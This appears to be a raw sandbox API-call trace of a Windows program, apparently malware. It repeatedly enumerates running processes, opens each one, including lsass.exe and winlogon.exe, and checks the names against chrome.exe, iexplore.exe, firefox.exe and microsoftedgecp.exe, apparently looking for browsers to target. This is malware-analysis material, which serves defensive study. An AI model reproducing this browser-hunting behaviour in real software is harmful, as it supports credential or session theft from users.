	[0237.728] ReadProcessMemory (in: hProcess=0x7bf0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.728] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.728] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7bf4
	[0237.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.729] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0237.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.731] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0237.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7bf8
	[0237.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0237.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0237.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.733] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.733] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7bfc
	[0237.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.734] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.734] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.734] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.735] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.735] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.736] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7c00
	[0237.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.736] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.737] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.737] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.737] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.738] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7c04
	[0237.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.738] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.739] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.739] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.739] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7c08
	[0237.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.740] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.741] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.741] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.741] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7c0c
	[0237.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.743] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.743] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.743] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.743] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7c10
	[0237.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.746] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.746] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.747] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.747] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.747] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0237.748] CloseHandle (hObject=0x4fd0) returned 1
	[0237.748] Sleep (dwMilliseconds=0x64) 
	[0237.854] GetCurrentProcessId () returned 0x110
	[0237.854] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0237.857] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0237.858] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0237.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0237.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7c14
	[0237.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.860] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.861] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.861] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.861] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7c18
	[0237.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.863] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.863] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.863] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.864] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.864] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0237.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7c1c
	[0237.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.865] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0237.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.865] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.866] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0237.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.866] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7c20
	[0237.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.867] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.867] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.867] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.868] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0237.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7c24
	[0237.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.869] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0237.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.869] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.870] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0237.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.871] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.871] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0237.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7c28
	[0237.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.872] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0237.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.872] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.872] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0237.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.873] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.873] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0237.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7c2c
	[0237.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.874] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0237.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.874] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.874] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0237.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.875] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0237.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7c30
	[0237.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.876] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.876] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.876] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.876] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.876] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7c34
	[0237.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.877] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.878] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.878] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.878] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7c38
	[0237.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.879] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.880] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.880] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.880] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7c3c
	[0237.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.881] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.882] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.882] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.882] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7c40
	[0237.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.883] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.884] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.884] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.885] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.886] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7c44
	[0237.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.887] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.887] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.887] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.888] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.888] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7c48
	[0237.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.889] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.889] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.890] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.891] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.891] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7c4c
	[0237.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.893] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.894] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.894] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.895] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
